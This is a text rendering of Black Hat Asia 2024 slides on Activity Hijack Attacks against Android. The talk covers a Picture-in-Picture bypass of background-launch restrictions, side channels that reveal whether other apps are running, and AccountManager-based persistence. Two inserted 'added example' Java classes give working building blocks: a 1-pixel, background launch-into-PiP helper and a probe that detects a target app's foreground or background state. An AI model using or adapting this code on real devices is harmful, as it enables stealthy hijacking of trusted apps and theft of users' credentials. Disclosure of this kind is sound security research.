Asia-24-WeiMinCheng-systemui-as-evilpip-the-hijacking-attacks-on-modern-mobile-devices.pdf

PDF, 79 pages, 2.23 MB
SystemUI As EvilPiP: The Hijacking Attacks on Modern Mobile Devices
Black Hat Asia 2024 (#BHASIA), WeiMin Cheng

Who Are We
- WeiMin Cheng, QI-ANXIN. GitHub: MG1937. Twitter: MGAldys4
- Yue Liu, QI-ANXIN. GitHub: lieanu. Mobile & AOSP binary researcher

Agenda
- What is an Activity Hijack Attack (AHA)
- Restrictions and policies released by Google
- Bypassing the security policies: BAL restriction, runtime state leak, strict LMKD
- Video demo of the full chain

What is AHA
- Activity Hijack Attack (AHA): almost zero cost and easy to exploit
- Hijack the target app to steal sensitive data or runtime privilege
- Used by adware, BankBot, ransomware and RATs

How AHA Works
- Take Android 4.0 as an example: Simplocker, malware for Android 4.0
- Its essence is abusing the NEW_TASK flag to seize the foreground (FG) task (slide shows a code snippet of Simplocker)
- The malicious Activity enters the FG task and the previous task is pushed to the background (BG)
- Now the malware can forge the trusted app: a StrandHogg-like hijack scheme
- Why does it have to seize the FG task to hijack?

Task and Back-Stack
- A task stack is a collection of activities
- The user can only interact with ONE front task (in most cases)

Classic Attack Scheme
- Low cost, high return
- Affects almost all apps on old devices

Key Factors of AHA
- Background Activity Launch (BAL)
- Detecting the target's running state
- A persistent background process

Google will not allow this to happen.

Restriction 0x1: No Leaking State
- getRunningTasks and getRunningAppProcesses require no permission
- Before API 22 these interfaces leak the runtime state of other apps: all running tasks and processes
- From API 22 on they only return the caller's own data
- A side channel still bypassed this before API 26: cat /proc/<target_pid>/oom_score_adj works for a non-privileged user!
- Google updated the SELinux policy in 2017 with hidepid=2-like protections, restricting app access to files outside the app domain (see hidepid in the man7 documentation)

Compromise Scheme
- Case of MysteryBot: turn to UsageStatsManager to leak the runtime state indirectly
- A dangerous runtime permission is required, with complex user interaction
- Some ROMs force a warning when it is granted!

Restriction 0x2: No BAL
- API 29+: an app without privilege cannot start an Activity from the background
- No BAL = cannot inject into the target from the background
- Most adware and hijackware disappeared because of this

Compromise Scheme
- Turn to AccessibilityService, system services or the SAW (SYSTEM_ALERT_WINDOW) permission
- Complex user interaction and dangerous runtime permissions
- Satisfying the BAL restriction exemptions in the documentation requires a system bind, a visible-app bind, or holding system privilege: almost impossible

Restriction 0x3: BEL & LMKD
- Background services in API 26+ get a high oom_adj and low priority!
- BG process = idle process; LMKD kills idle processes first
- The system broadcast trick is BANNED in API 24+!

Compromise Scheme (provided by Google)
- Start a foreground service to get a low oom_adj
- It has to notify the user: no silent process
- Third-party ROMs do not even allow a foreground service to run for a long time

But Does the Compromise Scheme Really Work?
- Granting dangerous permissions, complex user interaction and no silent running: the user is aware
- Case of Xiaomi OS: not even a persistent process
- High attack cost, highly detectable by the user: attack failed
- framework.jar smali code of MIUI: on #removeTask, AOSP calls #isProcStateBackground, while MIUI directly calls forceStop on all of the app's processes

So, Any Way to Bypass?
- No permission required
- Undetectable
- Hijack precisely
- Attack high-version devices

1st High Wall: BAL Restriction

Analyse BAL Restriction
- Activity#startActivity is handled by ActivityManagerService (AMS); on API 33 the request arrives at ActivityStarter#executeRequest
- ActivityStarter#setInitialState sets restrictedBgActivity, which determines whether the system tries to start the target component; ActivityStarter#startActivityInner then decides in moveToFront whether to move the task to the front
- We still need to focus on the check function and bypass it
- shouldAbortBackgroundActivityStart (shouldABAS): how is a visible window defined? The developer documentation gives some exemptions for the check function
- hasActiveVisibleWindow is what defines a visible window here
- Inside it, hasNonAppVisibleWindow reads mNumNonAppVisibleWindowMap, which is maintained from WindowState#onSurfaceShownChanged

Window Type & Z-Axis
- WindowState#getWindowLayerFromTypeLw, WindowToken#addWindow: a WindowComparator compares the BaseLayer value
- The window type decides mBaseLayer, which indirectly decides the Z-axis: higher BaseLayer, higher on the Z-axis

Visible Window
- hasNonAppVisibleWindow counts windows whose type is >= FIRST_SYSTEM_WINDOW and != TYPE_TOAST
- TYPE_APPLICATION_OVERLAY = FIRST_SYSTEM_WINDOW + 38
- A non-privileged app can only get a "system" window of TYPE_APPLICATION_OVERLAY, but that requires the SYSTEM_ALERT_WINDOW permission, which needs complex user interaction!
- A non-privileged app usually gets a BASE_APPLICATION window: invisible to this check most of the time

What is Picture-in-Picture
- A non-SAW, permission-less floating-window compromise scheme for developers
- The pinned Activity sits in a PiP window at the top of the screen, handled by the SystemUI component
- Window type >= FIRST_SYSTEM_WINDOW, and permission-less
- But the PiP window cannot hide from the screen: the pinned Activity can be detected by the user (even with a transparent theme), and the user can remove the PiP window at any time
- PiP is a highly detectable feature: unable to abuse PiP directly

CVE-2021-0485 by valsamaras
- Invalid input produces an abnormal PiP window: visible for the system, but invisible for the user
- Sets an abnormal height and width: an abnormal 1-pixel PiP window, almost invisible
- Patched in PipBoundsAlgorithm (commit aad7fdc4f82ad56e332d3c23c5d07719e069b099)

New Attack Surface
- A nice bug that expands the attack surface
- No need to bypass the visible-window check (abuse PiP)
- Create a legal system window that the user cannot detect
- Abuse the PiP API with abnormal input

How PiP Works
- ATMS#enterPictureInPictureMode -> RootWindowContainer#moveActivityToPinnedRootTask
- Task#sendTaskAppear -> ShellTaskOrganizer#onTaskAppeared -> (IPC to com.android.systemui) PipTaskOrganizer#onTaskAppeared: the PiP is rendered here

Analyse Attack Vector
- Scheme 0x1: attack the PiP chain so the app task is in the visible state but no SystemUI handles the PiP window: prevent the IPC!
- User space has no way to affect the code executing in system_server and cannot prevent the IPC; unfortunately no trick could be exploited
- Scheme 0x2: attack the SystemUI side and create a CVE-2021-0485-like vuln

Attack SourceRectHint
- The developer documentation of the setSourceRectHint API: auto scales and crops the Activity window by the passed-in Rect
- Abnormal Rect -> abnormal PiP window?
- Enter PiP mode with a 1-pixel Rect, running the POC on an android-13.0.0_r7 AVD: we indeed get a 1-pixel window, but it recovers to the normal size within around 0.5 s
- Any trick to extend the duration?

Trace Rect
- PipTaskOrganizer#onTaskAppeared -> animateResizePip: this transition resizes the PiP window to the Rect-defined size (1 px). But what happens after the resize?
- PipTransitionAnimator sets a callback handler: the onPipAnimationEnd interface is called after the PiP has entered, and inside it calls finishResize
- finishResize creates a WindowContainerTransaction (WCT) instance and passes it to prepareFinishResizeTransaction with the normal-size Rect defined by the system; that function sets a SurfaceControl.Transaction (SCT) and the Rect on the WCT
- applyFinishBoundsResize carries the WCT over IPC to system_server
- Task#setMainWindowSizeChangeTransaction: the extra SCT is passed over IPC into setMainWindowSizeChangeTransaction, and system_server directly calls merge to render it on screen
- The merge makes the PiP window resize back to normal. Any way to prevent the merge? Blocking the IPC (before it happens) would prevent the merge, but there is almost no way to do so

Diff Analyse
- Comparing different branches: a code change found in API 32, a functional patch rather than a security patch judging by the commit details, but still valuable to analyse
- API 32 DOES NOT CALL merge!

API 32 (android-12.1.0_r27)
- WindowStateAnimator#setSurfaceBoundariesLocked gets the SCT and sets it: HOOK FUNC!

Analyse Call Stack
- ActivityRecord#prepareSurface is in the call stack, related to Activity launch/rendering (entering PiP mode relaunches the Activity)
- User space can affect it indirectly!

Attack API 32
- On both API 33 and API 32, SystemUI finally calls setMainWindowSizeChangeTransaction (setMWSCT)
- API 33: 1. setMWSCT calls merge, no way to prevent the PiP size going back to normal; 2. the whole chain is handled by SystemUI
- API 32: 1. setMWSCT stores the SCT in a global member and waits for access; 2. an Activity redraw accesses the SCT and calls merge => freeze the redraw and merge will never be called
- CVE-20 (identifier truncated in the source): BAL bypass on API 32. We want an API 33+ bypass

ActivityOptions
- The api_diff list shows makeLaunchIntoPip, which returns an ActivityOptions object
- Activity#startActivity(Intent, Bundle): additional options for the Activity launch
- ActivityOptions#toBundle saves the received PipParams into the Bundle packaged by ActivityOptions under the LAUNCH_INTO_PIP_PARAMS key; the Bundle is used to set options for the Activity start

Trace Bundle
- startActivityInner calls moveToFront if the app passes the BAL check. What does the Bundle do inside the chain?
- CVE-20 (identifier truncated in the source): the Bundle is checked by isLaunchIntoPip(), which directly calls moveActivityToPinnedRootTask without any check. Where is the BAL restriction check?
- Sets the app to the pinned state from the background at any time on API 33+
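Added example, written for this page rather than taken from the talk or its PoC: the two PiP inputs the slides trace, put into one small helper class. onePixelParams() is the 1-px setSourceRectHint that produced the short-lived 1-px window on the Android 13 AVD, and launchIntoPipFromBackground() pushes the same params through ActivityOptions.makeLaunchIntoPip, the API 33 path whose launch Bundle carries LAUNCH_INTO_PIP_PARAMS. Assumptions that are mine, not the slides': the package and class names, that the launched Activity belongs to the caller's own package and declares android:supportsPictureInPicture="true", and that the background caller is a non-Activity component such as a BroadcastReceiver. Whether a given build still reaches moveActivityToPinnedRootTask without the BAL check is something to test on that build; the page gives no patch details.

```java
// Added example (not the talk's code). Package and class names are hypothetical.
package com.example.evilpip;

import android.app.Activity;
import android.app.ActivityOptions;
import android.app.PictureInPictureParams;
import android.content.Context;
import android.content.Intent;
import android.graphics.Rect;
import android.os.Build;
import android.os.Bundle;
import android.util.Rational;

public final class PipLaunch {
    private PipLaunch() {}

    /** Scheme 0x2: the abnormal 1x1 sourceRectHint the talk feeds to SystemUI's PiP chain. */
    public static PictureInPictureParams onePixelParams() {
        return new PictureInPictureParams.Builder()
                .setAspectRatio(new Rational(1, 1))       // stays inside the permitted PiP aspect range
                .setSourceRectHint(new Rect(0, 0, 1, 1))   // abnormal Rect: 1 px wide, 1 px high
                .build();
    }

    /**
     * Foreground path (API 26+): enter PiP from a resumed Activity. On the API 33 branch the
     * slides tested, SystemUI animates the window down to 1 px and then, once onPipAnimationEnd
     * runs finishResize and system_server merges its transaction, snaps it back to normal
     * bounds after roughly half a second.
     */
    public static boolean enterOnePixelPip(Activity activity) {
        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.O) {
            return false;   // PictureInPictureParams does not exist before API 26
        }
        return activity.enterPictureInPictureMode(onePixelParams());
    }

    /**
     * Background path (API 33+): ActivityOptions.makeLaunchIntoPip() packs the params into the
     * launch Bundle under LAUNCH_INTO_PIP_PARAMS. Per the talk, startActivityInner then sees
     * isLaunchIntoPip() and calls moveActivityToPinnedRootTask without the BAL visibility check.
     */
    public static Bundle launchIntoPipOptions() {
        return ActivityOptions.makeLaunchIntoPip(onePixelParams()).toBundle();
    }

    /** Call from a non-Activity context (assumed: a BroadcastReceiver or Service of this app). */
    public static void launchIntoPipFromBackground(Context ctx, Intent target) {
        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.TIRAMISU) {
            throw new IllegalStateException("makeLaunchIntoPip requires API 33");
        }
        target.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);   // required when ctx is not an Activity
        ctx.startActivity(target, launchIntoPipOptions());
    }
}
```

The target Intent should name an Activity of the same package with supportsPictureInPicture set; the NEW_TASK flag is the usual requirement for startActivity from a non-Activity Context and is unrelated to the bypass itself.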

2nd High Wall: State Leaking

Bug or Trick?
- A bug I met while developing an app: after a merge, the code threw an exception from startServiceCommon
- Before the merge the bug position called bindService; after the merge it called startService

Side Channel Detector
- Background Execution Limits throw an exception when a background service is started: a background process detector!
- Bypass the limitation? Exploit the limitation!
- A-2546745: in ActiveServices#startServiceLocked the system returns an abnormal ComponentName, and the exception is thrown in user space (POC for side-channel detection)

Other Tricks?
- For reasons of time, more side-channel tricks on other ROMs are in the white paper
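Added example covering two passages, Restriction 0x1 (the /proc/<pid>/oom_score_adj side channel) and this 2nd wall (the Background Execution Limits exception): one probe class with one method per channel. It is my code, not the talk's PoC. The package, class and method names are mine; the adj thresholds are the AOSP ProcessList constants (FOREGROUND_APP_ADJ 0, VISIBLE_APP_ADJ 100, PERCEPTIBLE_APP_ADJ 200); and the startService channel assumes the target exposes an exported Service whose class name you already know. The /proc channel only works where apps can still read other processes' /proc entries, i.e. before the hidepid/SELinux change the slides date to 2017; afterwards the probe returns UNKNOWN.

```java
// Added example (not the talk's code). Names are hypothetical.
package com.example.evilpip;

import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;

public final class TargetStateProbe {
    private TargetStateProbe() {}

    public enum State { FOREGROUND, VISIBLE, BACKGROUND, UNKNOWN }

    // AOSP ProcessList: FOREGROUND_APP_ADJ = 0, VISIBLE_APP_ADJ = 100, PERCEPTIBLE_APP_ADJ = 200.
    // Everything above PERCEPTIBLE (services, home, previous, cached) is treated as background.
    public static State classify(int oomScoreAdj) {
        if (oomScoreAdj <= 0) return State.FOREGROUND;
        if (oomScoreAdj <= 200) return State.VISIBLE;   // visible or perceptible (e.g. fg service)
        return State.BACKGROUND;
    }

    /**
     * Channel 1 (Restriction 0x1): read /proc/<pid>/oom_score_adj for every pid whose cmdline is
     * the target package. Under hidepid=2-style protection the other apps' pid directories are
     * simply not there, so the loop finds nothing and the method returns UNKNOWN.
     */
    public static State viaOomScoreAdj(String targetPackage) {
        File[] entries = new File("/proc").listFiles();
        if (entries == null) return State.UNKNOWN;
        int best = Integer.MAX_VALUE;   // lowest adj across the package's processes
        for (File dir : entries) {
            if (!dir.getName().matches("\\d+")) continue;
            String cmdline = readFirstLine(new File(dir, "cmdline"));
            // cmdline is NUL-terminated; an app's main process is named after its package
            if (cmdline == null || !cmdline.replace("\0", "").equals(targetPackage)) continue;
            String adj = readFirstLine(new File(dir, "oom_score_adj"));
            if (adj == null) continue;
            try {
                best = Math.min(best, Integer.parseInt(adj.trim()));
            } catch (NumberFormatException ignored) {
                // unreadable or malformed entry: skip this pid
            }
        }
        return best == Integer.MAX_VALUE ? State.UNKNOWN : classify(best);
    }

    /**
     * Channel 2 (2nd High Wall): Background Execution Limits as an oracle. startService() on an
     * exported service of the target is refused inside ActiveServices#startServiceLocked when the
     * TARGET's uid is idle (or has no process); ContextImpl turns the "?" ComponentName the system
     * hands back into an IllegalStateException. Side effect: when the target is not idle, its
     * service really is started.
     */
    public static State viaStartService(Context ctx, String targetPackage, String exportedService) {
        Intent probe = new Intent().setComponent(new ComponentName(targetPackage, exportedService));
        try {
            ComponentName started = ctx.startService(probe);
            // null: no such service, or the start was deferred; no usable signal
            return started == null ? State.UNKNOWN : State.FOREGROUND;   // uid not idle
        } catch (IllegalStateException e) {
            return State.BACKGROUND;   // "Not allowed to start service Intent ... app is in background"
        } catch (SecurityException e) {
            return State.UNKNOWN;      // not exported or permission-protected: no signal
        }
    }

    private static String readFirstLine(File f) {
        try (BufferedReader r = new BufferedReader(new FileReader(f))) {
            return r.readLine();
        } catch (IOException e) {
            return null;
        }
    }
}
```

Channel 2 is coarser than it looks: "not idle" covers a foreground app and one that was recently active, and the probe itself starts the target's service, which a target can notice. Channel 1 is precise but, as the slides say, closed on any build with the 2017 SELinux policy.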

3rd High Wall: Breaking LMKD

LMKD & OOM_ADJ Score
- Low-memory killer daemon: lower oom_adj = higher priority, higher oom_adj = lower priority
- LMKD kills the process with the highest oom score first
- A BG process always gets a high oom score; a FG service usually gets a score of 250: no silent process

OOM_ADJ Calc Trick
- OomAdjuster#computeOomAdjLSP: a service bound by a third-party client inherits from the binder's oom score, so the bound process may get VISIBLE_APP_ADJ

Attack Surface
- Bound by a system persistent process?
- A non-privileged app operates the managers (AMS, WMS) through the corresponding IBinder objects, and the managers run as system (UID=1000)
- Can the managers be abused?

AccessibilityService
- Accessibility functions are handled by AccessibilityManagerService
- A non-privileged app needs to declare a specific intent-filter pointing at a specific Service
- AccessibilityManagerService finds all services with that intent-filter, creates an AccessibilityServiceConnection for each and calls bindLocked (AccessibilityManagerService#updateServiceLocked)
- Bound by system! AccessibilityManagerService runs in system_server (UID=1000), which gets oom score -900; the non-privileged app gets oom score 100!
- But accessibility requires a dangerous, user-granted permission!

AccountManager
- The AccountManager API was added in API 5 (2009) and is handled by the privileged AccountManagerService
- For developers: declare a Service with the abstract component "AccountAuthenticator" and an intent-filter with the specific action. No dangerous runtime permission needed!

AddAccount
- Get the AccountManager via getSystemService and call addAccount
- new Session().bind() binds the specific component as system_server!
- A-2639277: AccountManager$AmsTask$Response#onResult elevates the high-priority process to a persistent process, making system_server keep binding the target! (POC)

Demo of Persistent POC

Full Chain of Hijack Exp

THANKS!
